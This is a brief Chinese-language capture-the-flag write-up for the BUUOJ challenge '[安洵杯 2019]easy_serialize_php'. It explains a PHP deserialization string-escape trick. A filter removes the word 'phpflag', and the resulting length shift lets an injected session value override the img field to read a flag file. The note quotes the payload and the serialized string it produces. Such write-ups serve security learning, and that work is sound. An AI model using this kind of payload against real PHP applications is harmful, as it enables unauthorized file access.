刷題記錄:[安洵杯 2019]easy_serialize_php


刷題記錄:[安洵杯 2019]easy_serialize_php

題目復現鏈接:https://buuoj.cn/challenges
參考鏈接:第二屆安洵杯2019部分writeup

知識點

PHP反序列化

payload為_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
extract后覆蓋了兩個沒用的屬性,但是后面又強制加了一個我們不可控的img屬性。這個payload的精妙之處就在於phpflag被替換為空后,$serialize_info的內容為
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
剛好把后面多余的img部分截斷掉


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM